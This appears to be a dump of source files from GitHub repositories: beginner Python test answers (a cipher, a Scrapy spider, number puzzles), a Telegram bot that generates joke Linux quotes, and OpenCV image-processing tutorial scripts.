"0fb136b8d6c1e88539336cc0f6559d5e35921076", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 89, "license_type": "no_license", "max_line_length": 25, "num_lines": 9, "path": "/Q1py/Q1.py", "repo_name": "pedroslark/Acens", "src_encoding": "UTF-8", "text": "x = 2\ny = 5\nif y > 8:\n y = y*2\nelse:\n x = x*2\nprint x+y\n\n#A saida do programa eh 9\n" }, { "alpha_fraction": 0.5885885953903198, "alphanum_fraction": 0.5945945978164673, "avg_line_length": 29.272727966308594, "blob_id": "4f81c0f03a96e1ed278662b99c268b8bfb782465", "content_id": "7fe71ba3f21e12ba7683faf58dbe52ebfe21e843", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 333, "license_type": "no_license", "max_line_length": 57, "num_lines": 11, "path": "/Q6py/Q6py/spiders/siasdo_spider.py", "repo_name": "pedroslark/Acens", "src_encoding": "UTF-8", "text": "import scrapy\n\nclass SiasdoSpider(scrapy.Spider):\n name = \"siasdo\"\n allowed_domains = [\"siasdo.com.br\"]\n start_urls = [\"http://siasdo.com.br\"]\n\n def parse(self, response):\n for sel in response.xpath('//section/div/ul/li'):\n desc = sel.xpath('text()').extract()\n print desc[0].encode('utf-8')\n" }, { "alpha_fraction": 0.6338174343109131, "alphanum_fraction": 0.636929452419281, "avg_line_length": 27.352941513061523, "blob_id": "0cf7bd903641cb449494d26f21f5a843b5df70e4", "content_id": "24d5f532270676e027360caef481d209db7352d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 964, "license_type": "no_license", "max_line_length": 84, "num_lines": 34, "path": "/Q7py/Q7.py", "repo_name": "pedroslark/Acens", "src_encoding": "UTF-8", "text": "def encrypt(text, key):\n encrypted_text = ''\n alphabet, encrypted_alphabet = get_alphabet(key)\n\n for char in text:\n if char == ' ': encrypted_text += ' '\n else: encrypted_text += encrypted_alphabet[alphabet.index(char)]\n return encrypted_text\n\ndef decrypt(text, key):\n decrypted_text = ''\n alphabet, encrypted_alphabet = get_alphabet(key)\n\n for char in text:\n if char == ' ': decrypted_text += ' '\n else: decrypted_text += alphabet[encrypted_alphabet.index(char)]\n return decrypted_text\n\ndef get_alphabet(key):\n alphabet = [chr(x) for x in range(ord('a'), ord('z')+1)]\n encrypted_alphabet = []\n for i in range(len(alphabet)):\n if i < key: encrypted_alphabet.append(alphabet[i])\n else: encrypted_alphabet.insert(encrypted_alphabet.index('a'), alphabet[i])\n return alphabet, encrypted_alphabet\n\n# testing \\/\na = 'hello world'\nb = encrypt(a, 5)\nc = decrypt(b, 5)\n\nprint a\nprint b\nprint c\n" }, { "alpha_fraction": 0.7437499761581421, "alphanum_fraction": 0.7437499761581421, "avg_line_length": 16.77777862548828, "blob_id": "81b722ce9e949833b416d2ed6ae61a20167ae470", "content_id": "a5039968abbe906b76230944322bee49da255629", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 160, "license_type": "no_license", "max_line_length": 65, "num_lines": 9, "path": "/README.md", "repo_name": "pedroslark/Acens", "src_encoding": "UTF-8", "text": "# Acens\n\n>A simple repository to upload and show my answers in Acens test.\n\n>No license.\n\n>Each question is in it's own folder.\n\n>Everything was made in Python\n" }, { "alpha_fraction": 0.5985662937164307, "alphanum_fraction": 0.6272401213645935, "avg_line_length": 23.2608699798584, "blob_id": "437449854e3c06d5c97edf0835f0eacc18f693e4", "content_id": "eb4ed6dbb1cdfd2890c75590d764c18590266ced", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 558, "license_type": "no_license", "max_line_length": 74, "num_lines": 23, "path": "/Q5py/Q5.py", "repo_name": "pedroslark/Acens", "src_encoding": "UTF-8", "text": "with open('numbers.txt', 'r') as myfile:\n data = myfile.read().replace('\\n', ' ')[:-1]\n\nnumbers = data.split()\nnumbers1 = []\n\nfor number in numbers:\n consecutive = False\n for i in range(len(number)-1):\n if number[i] == number[i+1]: consecutive = True\n if not consecutive: numbers1.append(number)\n\nnumbers2 = []\nfor number in numbers1:\n sum = 0\n for i in number: sum += int(i)\n if sum % 2 == 0: numbers2.append(number)\n\nnumbers3 = [number for number in numbers2 if number[0] is not number[-1:]]\n\nprint len(numbers3)\n\n## gg easy :)\n" }, { "alpha_fraction": 0.5699300765991211, "alphanum_fraction": 0.6468531489372253, "avg_line_length": 18.066667556762695, "blob_id": "6b801ef9d48f171e07c5bec3ef24b0e57bb19f39", "content_id": "15c0512dc95c1187974f985a30bee2895e829ad5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 291, "license_type": "no_license", "max_line_length": 70, "num_lines": 15, "path": "/Q3py/Q3.py", "repo_name": "pedroslark/Acens", "src_encoding": "UTF-8", "text": "country_a = 80000\ncountry_b = 200000\ncount = 0\n\nwhile country_a < country_b:\n country_a = country_a + (country_a * 0.03)\n country_b = country_b + (country_b * 0.015)\n\n count += 1\n\nprint count\n\n#63 anos para o país A ultrapassar, ou igualar, à população do país B.\n\n#gg easy :D\n" }, { "alpha_fraction": 0.7403650879859924, "alphanum_fraction": 0.7484787106513977, "avg_line_length": 31.866666793823242, "blob_id": "da97e2249ff0fe1446549ef618bf95509068b35f", "content_id": "0b614619661d0afcc529140678d1ca01141a5bc3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 493, "license_type": "no_license", "max_line_length": 198, "num_lines": 15, "path": "/Q6py/README.md", "repo_name": "pedroslark/Acens", "src_encoding": "UTF-8", "text": "#Question 6\n\n>For this question i've used the crawling framework [Scrapy](http://scrapy.org).\n\n>I've made a simple spider to get the information from the website and print in the console. You can see it [here](https://github.com/pedroslark/Acens/blob/master/Q6py/Q6py/spiders/siasdo_spider.py)\n\n###Running\n\nTo run it, you must have Scrapy installed in your macbine. You can install it by:\n\n`<pip install scrapy>`\n\nGo to the root directory of the project \"Q6\" and run:\n\n`<scrapy crawl siasdo>`\n" }, { "alpha_fraction": 0.4623115658760071, "alphanum_fraction": 0.5125628113746643, "avg_line_length": 17.904762268066406, "blob_id": "afe53abd5f138586a0e8d7ecc9d9b4239229f562", "content_id": "193eb640ea3fca3d59df25f4a4cd7926c25ae0f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 398, "license_type": "no_license", "max_line_length": 74, "num_lines": 21, "path": "/Q4py/Q4.py", "repo_name": "pedroslark/Acens", "src_encoding": "UTF-8", "text": "A = []\nB = []\nV = []\n\nwhile len(A) < 10:\n i = input('Digite um numero inteiro, entre 1 e 100, para o vetor A: ')\n if i >= 1 and i <= 100:\n A.append(i)\n\nwhile len(B) < 10:\n i = input('Digite um numero inteiro, entre 1 e 100, para o vetor B: ')\n if i >= 1 and i <= 100:\n B.append (i)\n\nfor x in range (len(A) ):\n V.append (A[x])\n V.append (B[x])\n\nprint V\n\n#GG easy :)\n\n" } ]
9
Aeres-u99/Linux-Quotes
https://github.com/Aeres-u99/Linux-Quotes
3be27bd71e8b2caecc0b19472b8f30e0fbce9bca
0eaed334512a7bcd48d754a827fb5d2b759efdcc
e72945af9ce589e534be5abbc3233e9f3c6b7eac
refs/heads/main
2023-01-20T21:48:57.577380
2020-11-27T12:03:13
2020-11-27T12:03:13
316,419,090
1
1
null
null
null
null
null
[ { "alpha_fraction": 0.71875, "alphanum_fraction": 0.71875, "avg_line_length": 33.28571319580078, "blob_id": "cd307ee9006a60c503f57067aada3e8ea27f28e9", "content_id": "287b4e276819da2e02eb368578538495dedbf8e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 960, "license_type": "no_license", "max_line_length": 101, "num_lines": 28, "path": "/README.md", "repo_name": "Aeres-u99/Linux-Quotes", "src_encoding": "UTF-8", "text": "### Linux Quotes Bot\nIts a simple bot that modified certain keywords from a quote and generates \"Linux\" themed quotes, \nThe quotes is from famous people except it isnt. These are fake quotes for fun purposes, feel free to\nadd it into your group and laugh out loud. \n\n\n#### FAQ\n* How can I add my quote? \n \n Just send a pr for quote.csv, it will be added\n* How can I add more keywords?\n \n Please modify quoter.py, it has all that you will need. \n* How can I add more tags? \n \n Same, quoter.py\n* Why do you use botogram? \n \n I use what I like. Please recreate one for yourself if you arent comfy, feel free to fork. \n* I have a very interesting idea of xyz feature\n \n Sure it must be amazing, but this is going to stay barebones\n* Why not fetch quotes from internet and modify them? \n \n Well, that \"might\" get implemented (or it may never, trust me idk about my schedule either)\n* Can i add it into my group? \n \n Sure, but please host it yourself.\n" }, { "alpha_fraction": 0.5704681873321533, "alphanum_fraction": 0.5723889470100403, "avg_line_length": 52.371795654296875, "blob_id": "b0f6afdf1a0a2bf495bcb944731eb8934a9b8a1a", "content_id": "8c9373d8141a8c4fde273abb512887f8f1b4b90d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4165, "license_type": "no_license", "max_line_length": 352, "num_lines": 78, "path": "/quoter.py", "repo_name": "Aeres-u99/Linux-Quotes", "src_encoding": "UTF-8", "text": "#!/bin/env python3\nimport csv\nimport random\ndef replaceWords():\n replacement_dictionary = {\n \"failed\":['broken my system','fucked up linux','borked my machine'],\n \"battles\":['Linux system','Fight about Inits','Emacs vs Vim'],\n \"medals\":['glories','stars','pull requests'],\n \"test\":['unit tests','testing scripts','test cases'],\n \"fail\":['failed at compiling','break','berakdown'],\n \"machine\":['linux system machine','linux based machine','linux based'],\n \"airplane\":['linux kernel','linux sysfs','linux procfs'],\n \"you\":['user','programmer','hacker'],\n \"your\":['user\\'s','programmer\\'s','hacker\\'s'],\n \"reading\":['inspecting','read operation','read action'],\n \"writing\":['Saving to disk','Saving to ram','accessing from ram'],\n \"door\":['back door','vulnerability','bug'],\n \"passion\":['love for linux','hacking','coding'],\n \"devoid\":['without','nullified','messed'],\n \"nothing\":['null','void','/dev/null'],\n \"impossible!\":['tiny kernel','bloat free','null zero'],\n \"possible\":['bloated','heavy','could happen'],\n \"that\":['system','server','machine'],\n \"if\":['conditional','switch case','possibility'],\n \"person\":['expert','deccent user','hacker'],\n \"someone\":['X','/dev/xyz device','some user'],\n \"children\":['Process child\\'s','process','thread'],\n \"everything\":['world repository','system repostory','git world repo'],\n \"learned\":['pro','stallman','original hackers'],\n \"disappointed\":['systemd','init','X server'],\n \"always\":['Infinite times','Forever','Never Ending'],\n \"life\":['linux','linux system','kernel'],\n \"dream\":['hack','mess with it','fuck it'],\n \"work\":['hack','code','rice'],\n \"roads\":['source code','compilers','roads'],\n \"traveled\":['played with','hacked on','traveled'],\n \"decision\":['distro to choose','kernel','bsd'],\n \"capitalism\":['kernel','linux','FOSS development'],\n \"happens\":['breaks','creates','crashes'],\n \"plant\":['choose a distro','read code','plant'],\n \"unexamined\":['life without','life without ','Arch based'],\n \"success\":['rice','source code','code readability'],\n \"Winning\":['Kernel Hack','Using Linux','FOSS development'],\n \"win\":['successful compilaton',\"gentoo\",\"LFS\"],\n \"child\":['n00b','newbie','begginer'],\n \"ocean\":['source code','binary file',\"ocean of code\"],\n \"cross\":['read','hack','play with'],\n \"day\":['code','binary','assembly'],\n \"forget\":['distro hop','use systemd','sysvinit'],\n \"born\":['given for free','you have stolen','linux user'],\n \"revenge\":['virus','bug','hack'],\n \"motivation\":['desire to gentoo','using arch linux','loving FOSS'],\n \"nothing\":['coding','playing','hacking'],\n \"criticism\":['bug','hack','malware'],\n \"confidently\":['with bugs','life with coke','coffee']\n }\n tags = ['Distro Hopper','Kernel hacker','FOSS lover','Gentoo user (I burnt my weewee compiling kernel)','Arch (I use arch btw)','LFS hacker (I have no need for package manager)','Gnome Developer (We break freely)','Debian Maintainer (README is for noobs)','Debian Maintainer (We hate systemd)','Systemd lover (I am the best, your opinion is shit)']\n \n \n with open('quotes.csv', 'r') as quotes:\n reader = csv.reader(quotes)\n quote = random.choice(list(reader))\n words = quote[0].split(\" \")\n words = [word.lower() for word in words]\n flag = False\n for word in words:\n if word in replacement_dictionary.keys():\n flag = True\n modified_words = [replacement_dictionary[word][random.randint(0,2)] if x == word else x for x in words]\n author = quote[1] + \" \"\n author += random.choice(tags)\n if not flag:\n author = quote[1]\n modified_words = words\n keyquote = \" \".join(modified_words).capitalize()\n keyauthor = author\n string_output = keyquote + \"\\n --\" + keyauthor\n return string_output\n\n\n" }, { "alpha_fraction": 0.683080792427063, "alphanum_fraction": 0.6868686676025391, "avg_line_length": 28.296297073364258, "blob_id": "4a7cd2e52d73c01fcd84b4d4826855ebdf466a22", "content_id": "2c8b4b7ee934339b7d7211196386112ff1b06c36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 792, "license_type": "no_license", "max_line_length": 159, "num_lines": 27, "path": "/pybot.py", "repo_name": "Aeres-u99/Linux-Quotes", "src_encoding": "UTF-8", "text": "#!/bin/env python3\nfrom quoter import replaceWords\nimport botogram\nbot = botogram.create(\"your api key here\")\nbot.owner = \"KeiTachikawa on telegram, aeres99[at]gmail.com\"\nbot.after_help = [\n \"This bot simply gives new random quotes.\",\n]\n\n\[email protected](\"hello\")\ndef hello_command(chat,message, args):\n \"\"\"This basically says hello, and tells about the bot. Its goal and purpose\"\"\"\n chat.send(\"Hello, I am linux quotes bot. Please note none of these quotes are real, they are made for fun and no cute animals were harmed in its creation\")\n\[email protected](\"new\")\ndef new_command(chat,message, args):\n \"\"\"Send in the new random quote!\"\"\"\n output_quote = replaceWords()\n print(\"*\"*10)\n print(output_quote)\n chat.send(output_quote)\n\n\n\nif __name__ == \"__main__\":\n bot.run()\n\n" } ]
3
jzjosuerivera71/SIMPy
https://github.com/jzjosuerivera71/SIMPy
557c1758fc9604d5e963dbdc1f27f0f45692eaac
56b09e00592ce7c13dc5497c06b2896ff46f3638
24d2f076946ea2c9ea038ab92f03f7b9adbaf434
refs/heads/master
2021-05-26T15:24:02.282167
2013-09-27T12:08:29
2013-09-27T12:08:29
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5905796885490417, "alphanum_fraction": 0.6277173757553101, "avg_line_length": 25.285715103149414, "blob_id": "5fdce670ab059762d8a84ab12c0ade93687556c2", "content_id": "b5fcbaba6a27395c97c37c7a767088741801b6ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1104, "license_type": "no_license", "max_line_length": 73, "num_lines": 42, "path": "/test.py", "repo_name": "jzjosuerivera71/SIMPy", "src_encoding": "UTF-8", "text": "from scipy import sparse as sp\nfrom scipy.sparse.linalg import spsolve\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport SIMPy\n\n##################\n# Pousuille flow #\n##################\n\nN = 10 # problem size\ntol = 1e-4 # tolerance for solution\nimax = 1000 # max number of iterations\nmethod = \"SOR\" # SIM method\nomega = 1.2 # factor for SOR\nx = np.zeros(N) # starting guess for solution\nz = np.linspace(0, 1, N) # generate grid\n\n# Assemble tri-diagonal system matrix for CDS operator\ndata = np.zeros((3, N))\ndata[0, 0:N-1] = 1 # super diagonal\ndata[1, :] = -2 # diagonal\ndata[2, 1:N] = 1 # sub diagonal\noffsets = np.array([-1, 0, 1])\nA = sp.spdiags(data, offsets, N, N, format=\"csc\")\n\n# Assemble source vector\nb = np.zeros(N)\nb[1:N] = -8/(N-1) ^ 2\n\nu1 = spsolve(A, b) # direct solution\nu2, _, iter, _, G = SIMPy.solve(A, b,\n \"sor\", 500, 1e-4, 1, np.ones(N), False) # iterative solution\n\n## Plotting\nplt.plot(u1, z, '--o', linewidth=2, label=\"direct solution\")\nplt.plot(u2, z, '--o', linewidth=2, label=\"iterative solution\")\nplt.legend()\nplt.show()\nplt.ion()\n\nprint(\"done!\")\n" }, { "alpha_fraction": 0.5807228684425354, "alphanum_fraction": 0.5948100090026855, "avg_line_length": 34.728477478027344, "blob_id": "a9ec83f1ea4cca460e28043222f26b6f971be679", "content_id": "65015b0704718c06b55b81ac01289837472c3ac6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5395, "license_type": "no_license", "max_line_length": 77, "num_lines": 151, "path": "/SIMPy.py", "repo_name": "jzjosuerivera71/SIMPy", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom scipy import sparse as sp\nfrom scipy.sparse.linalg import spsolve\n\n\ndef my_diag(A):\n \"\"\"\n Extraction of diag from a sparse matrix.\n \"\"\"\n\n N = np.size(A, 1) # get number of diag elements = num colums\n ii = np.arange(0, N) # create seq of int from 1 to N\n return A[ii, ii]\n\n\ndef solve(A, b, *vartuple):\n \"\"\"\n Solves system of linear equations A*x=b using a stationary iterative\n method. Terminates after maximum imax iterations, or when the inf-norm\n of the residual, relative the inf-norm of the initial residual, becomes\n less than tol. The following stationary iterative methods are\n implemented: Jacobi, Gauss-Seidel, SOR.\n\n Syntax:\n -------\n x,error,iter,flag,G = SIMPy(A, b, method, imax, tol, omega, x, reqG)\n\n Input :\n -----\n A : system matrix\n b : right hand side vector (default init. with zero-vector)\n method : SIM, \"jacobi\",\"gs\",\"sor\" (delfault method is jacobi)\n imax : maximum number of iterations (default is number of equations)\n tol : tolerance on residual, relative to initial residual (sqrt(eps))\n omega : SOR-relaxation parameter, 0 <= omega < 2 (defualt 1)\n x0 : initial guess vector\n reqG : request G, => True or False (default False)\n\n Output :\n ------\n x : solution to A*x = b (converged)\n error : history of inf-norm of residual normed w.r.t. initial residual\n iter : number of iterations to reach converged solution\n flag : convergence flag (0: solution converged, 1: no convergence)\n G : iteration matrix (expensive! - don\"t request unless needed)\n\n Note :\n ----\n SIMPy is a python \"conversion\" of handout material from DTU course 41319\n\n \"\"\"\n\n # Set default input, if arguments are not given\n nvargin = len(vartuple) # determine number of variable input arguments\n\n if nvargin < 6: # reqG undefined\n reqG = False # default 0 = no\n else:\n reqG = vartuple[5]\n if nvargin < 5: # x0 undefined\n x = 0*b # default init. with zero-vector\n else:\n x = vartuple[4]\n if nvargin < 4: # omega undefined\n omega = 1 # default omega, sor=>gs\n else:\n omega = vartuple[3]\n if nvargin < 3: # tol undefined\n tol = np.sqrt(np.spacing(1)) # default tol\n else:\n tol = vartuple[2]\n if nvargin < 2: # imax undefined\n imax = np.size(A, 0) # default imax\n else:\n imax = vartuple[1]\n if nvargin < 1: # method undefined\n method = \"jacobi\" # delfault method\n else:\n method = vartuple[0]\n\n # Compute initial residual vector and norm\n returnflag = 0 # initialize flag for early function return\n rhsInorm = np.linalg.norm(b, np.inf) # Inf-norm of rhs-vectorhon\n\n if rhsInorm == 0: # homogene problem, x = b = 0\n x = b # homogene solution\n error0 = 0 # zero error\n returnflag = 1 # return function\n else: # inhomogene problem, non-zero rhs vector\n if np.linalg.norm(x, np.inf) == 0: # zero initial guess\n res = rhsInorm # norm of residual vector\n error0 = 1 # relative error\n else: # non-zero initial guess\n r = b - A*x # initial residual vector\n res = np.linalg.norm(r, np.inf) # norm of residual vector\n error0 = res/rhsInorm # relative error for initial guess\n if error0 <= tol: # initial error less than tolerance\n returnflag = 1 # return function\n res0 = res # ini. res. - stored for error computation\n\n # Matrix splitting based on \"method\" input\n if method.lower() == \"jacobi\": # jacobi splitting\n w = 1\n M = sp.spdiags(my_diag(A), 0, np.size(A, 0), np.size(A, 1))\n N = M-A\n elif method.lower() == \"gs\": # gauss-seidel splitting\n w = 1\n M = sp.tril(A, 0)\n N = M-A\n elif method.lower() == \"sor\": # SOR splitting\n w = omega\n diagV = my_diag(A) # extract diagonal of sparse matrix\n M = sp.spdiags(diagV, 0, np.size(A, 0), np.size(A, 1)) \\\n + w*sp.tril(A, -1)\n N = (1-w)*sp.spdiags(diagV, 0, np.size(A, 0), np.size(A, 1)) \\\n - w*sp.triu(A, 1)\n\n # Compute iteration matrix if requested as output (expensive!)\n G = 0 # set default return value for G\n if reqG: # iteration matrix requested\n print(np.shape(M))\n print(np.shape(N))\n G = spsolve(M, N, None, False) # iteration matrix\n\n # Return function\n if returnflag == 1:\n iter = 0\n flag = 0\n return x, error0, 0, flag, G\n\n # Iterate till error < tol\n iter = 0 # initialize iteration counter\n error = np.zeros(imax+1) # vector to hold iteration error history\n error[0] = error0\n\n while iter < imax and error[iter] > tol:\n iter = iter+1 # update iteration counter\n x = spsolve(M, N*x+w*b) # update approximation\n r = b - A*x # residual vector\n res = np.linalg.norm(r, np.inf) # norm of residual vector\n error[iter] = res/res0 # relative error\n\n error = error[0:iter+1] # remove undone iterations from error\n\n # Check for final convergence\n if (error[iter] > tol): # no convergence\n flag = 1 # failed convergence flag\n else: # solution converged\n flag = 0 # convergence flag\n\n return x, error, iter, flag, G\n" } ]
2
feniltailor22/Computer_Vision
https://github.com/feniltailor22/Computer_Vision
78bf9917e2e51a16346b40aa9fc55e7b357bb698
55347527b516b033e15386cd191abb9263eb71cf
65038d038dfbd7c24ee46d2a1269807963a5bb8b
refs/heads/main
2023-08-22T13:54:51.317029
2021-10-23T04:37:14
2021-10-23T04:37:14
392,042,028
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.669284462928772, "alphanum_fraction": 0.7024433016777039, "avg_line_length": 28.210525512695312, "blob_id": "00650bbd43a3ecf37f21c3dac0003d92db493267", "content_id": "1b6aceb2f1a9029924f9db31f4a6f05bf3985e4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1146, "license_type": "no_license", "max_line_length": 83, "num_lines": 38, "path": "/Smoothing or Blurring Images.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nfrom numpy.core.fromnumeric import size\r\n\r\nimg= cv2.imread('lena.jpg',1)\r\nimg= cv2.cvtColor(src= img, code=cv2.COLOR_BGR2RGB)\r\n\r\n#Homogeneous Filter\r\nkernel= np.ones((5,5), np.float32)/25\r\ndst= cv2.filter2D(src=img, ddepth=-1, kernel=kernel)\r\n\r\n#Average filter/Low Pass Filter helps in removing noises, blurring the images.\r\nblur= cv2.blur(src=img, ksize=(5,5))\r\n\r\n#High Pass Filter helps in finding edges in the images.\r\ngblur= cv2.GaussianBlur(src=img, ksize=(5,5), sigmaX=0)\r\n\r\n#Median filter is used to remove sal and paper noise from the image.\r\nmedian= cv2.medianBlur(src=img, ksize=5)\r\n\r\n#Bilateral filter remove noise while preserving border precisely. \r\nbilateral= cv2.bilateralFilter(src=img, d=9, sigmaColor=75, sigmaSpace=75)\r\n\r\ntitles= ['image', '2D Convolution', 'blur', 'gaussian blur', 'median', 'bilateral']\r\nimages= [img, dst, blur, gblur, median, bilateral]\r\n\r\nfor i in range(6):\r\n plt.subplot(3,3,i+1)\r\n plt.imshow(images[i],'gray')\r\n plt.title(titles[i])\r\n plt.xticks([])\r\n plt.yticks([])\r\n\r\nplt.show()\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6919274926185608, "alphanum_fraction": 0.7133443355560303, "avg_line_length": 30.373332977294922, "blob_id": "421bdf25f70747ad912f3d5176ceb3e8542653d7", "content_id": "167710f772a8594898643b73971b8f4181030c1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2428, "license_type": "no_license", "max_line_length": 102, "num_lines": 75, "path": "/Image Blending Using Pyramid.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "#Image Blending Method have five steps:\r\n#(i) Load Two Images(same size) that you want to Blend.\r\n#(ii) Find the Gaussian Pyramids for both of the Images.\r\n#(iii) From Gaussian Pyramids, find their Laplacian Pyramids.\r\n#(iv) Now join the left half of Image-1 and right half of Image-2 in each level of Laplacian Pyramids.\r\n#(v) Finally from this joint image pyramids, reconstruct the original image.\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\napple= cv2.imread('apple.jpg',1)\r\norange= cv2.imread('orange copy.jpg',1)\r\n\r\nprint(apple.shape)\r\nprint(orange.shape)\r\n\r\n#Half Apple and Half Orange in one Image without Blending\r\napple_orange= np.hstack((apple[:, :256],orange[:, 256:]))\r\n\r\n#Generate Gaussian Pyramids for Apple\r\napple_layer= apple.copy()\r\ngp_apple= [apple_layer]\r\n\r\nfor i in range(6):\r\n apple_layer= cv2.pyrDown(apple_layer)\r\n gp_apple.append(apple_layer)\r\n\r\n#Generate Gaussian Pyramids for Orange\r\norange_layer= orange.copy()\r\ngp_orange= [orange_layer]\r\n\r\nfor i in range(6):\r\n orange_layer= cv2.pyrDown(orange_layer)\r\n gp_orange.append(orange_layer)\r\n\r\n#Generate Laplacian Pyramids for Apple\r\napple_layer= gp_apple[5]\r\nlp_apple= [apple_layer]\r\n\r\nfor i in range(5, 0, -1):\r\n gaussian_extended_apple= cv2.pyrUp(gp_apple[i])\r\n laplacian= cv2.subtract(src1=gp_apple[i-1], src2=gaussian_extended_apple)\r\n lp_apple.append(laplacian)\r\n\r\n#Generate Laplacian Pyramids for Orange\r\norange_layer= gp_orange[5]\r\nlp_orange= [orange_layer]\r\n\r\nfor i in range(5, 0, -1):\r\n gaussian_extended_orange= cv2.pyrUp(gp_orange[i])\r\n laplacian= cv2.subtract(src1=gp_orange[i-1], src2=gaussian_extended_orange)\r\n lp_orange.append(laplacian)\r\n\r\n#Now add left and right halves of images in each level\r\napple_orange_pyramid=[]\r\nn=0\r\nfor apple_lap, orange_lap in zip(lp_apple, lp_orange):\r\n n+=1\r\n cols, rows, ch= apple_lap.shape\r\n laplacian= np.hstack((apple_lap[:, 0:int(cols/2)], orange_lap[:, int(cols/2):]))\r\n apple_orange_pyramid.append(laplacian)\r\n\r\n#Now reconstruct\r\napple_orange_reconstruct= apple_orange_pyramid[0]\r\nfor i in range(1,6):\r\n apple_orange_reconstruct= cv2.pyrUp(apple_orange_reconstruct)\r\n apple_orange_reconstruct= cv2.add(apple_orange_pyramid[i], apple_orange_reconstruct)\r\n\r\ncv2.imshow('apple',apple)\r\ncv2.imshow('orange',orange)\r\ncv2.imshow('apple_orange',apple_orange)\r\ncv2.imshow('apple_orange_reconstruct',apple_orange_reconstruct)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n" }, { "alpha_fraction": 0.6328871846199036, "alphanum_fraction": 0.6634799242019653, "avg_line_length": 21.863636016845703, "blob_id": "eb67524f524fccf039b1e0ed9dd27ff1f31a452f", "content_id": "4532494925c4f28c8bef180edf511e06c0ceb2c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 523, "license_type": "no_license", "max_line_length": 108, "num_lines": 22, "path": "/Image Uploading and Saving.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import cv2\r\n\r\nimg= cv2.imread('lena.jpg',0)\r\n# IMREAD_UNCHANGED = -1,\r\n# IMREAD_GRAYSCALE = 0,\r\n# IMREAD_COLOR = 1\r\n\r\n#Printing image in pixel values\r\nprint(img)\r\n\r\ncv2.imshow('image', img)\r\n\r\n#To capture the image for longer time, we use capture key argument.\r\n\r\nk= cv2.waitKey(0)\r\n\r\n#If we press Esc key(27) then we will not save the image or else saving the copy of img by pressing 's' key:\r\nif k == 27:\r\n cv2.destroyAllWindows()\r\nelif k == ord('s'):\r\n cv2.imwrite('lena_copy.jpg',img)\r\n cv2.destroyAllWindows()" }, { "alpha_fraction": 0.6563916802406311, "alphanum_fraction": 0.6890299320220947, "avg_line_length": 25.625, "blob_id": "4a3c15128b0de7154518ad2b0541a9181d1d7d90", "content_id": "992152d092bc263e6ec95cfd7838fa684c9cf55c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1103, "license_type": "no_license", "max_line_length": 85, "num_lines": 40, "path": "/Edge Detection using Image Gradient.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "#An Image Gradient is a directional change in the intensity or color in an Image. \r\n#It is used to detect the Edges in the Images.\r\n\r\nimport numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\n\r\nimg= cv2.imread('sudoku.png',0)\r\n\r\n#Laplacian Gradient\r\nlap= cv2.Laplacian(src=img, ddepth=cv2.CV_64F, ksize=3)\r\n#cv2.CV_64F supports the negative numbers of an image produced by Laplacian Gradient.\r\nlap= np.uint8(np.abs(lap))\r\n\r\n#SobelX (Order of derivative X)\r\nSobelX= cv2.Sobel(src=img, ddepth=cv2.CV_64F, dx=1, dy=0)\r\nSobelX= np.uint8(np.abs(SobelX))\r\n\r\n#SobelY (Order of derivative X)\r\nSobelY= cv2.Sobel(src=img, ddepth=cv2.CV_64F, dx=0, dy=1)\r\nSobelY= np.uint8(np.abs(SobelY))\r\n\r\n#Combining SobelX and SobelY\r\nSobelComb= cv2.bitwise_or(src1=SobelX, src2=SobelY)\r\n\r\n\r\ntitles= ['image', 'Laplacian', 'SobelX', 'SobelY', 'Sobel Combined', 'Canny']\r\nimages= [img, lap, SobelX, SobelY, SobelComb]\r\n\r\nfor i in range(5):\r\n plt.subplot(2,3,i+1)\r\n plt.imshow(images[i],'gray')\r\n plt.title(titles[i])\r\n plt.xticks([])\r\n plt.yticks([])\r\n\r\nplt.show()\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6082234382629395, "alphanum_fraction": 0.6524437665939331, "avg_line_length": 28.023256301879883, "blob_id": "574e83cfaf4630606c96a5c1430fbdbacb5230d9", "content_id": "662a3e257672b249bca0178ef4c4a005a11dc6e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1289, "license_type": "no_license", "max_line_length": 58, "num_lines": 43, "path": "/Object Detection and Object Tracking Using HSV Color Space.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\n\r\ndef nothing(x):\r\n 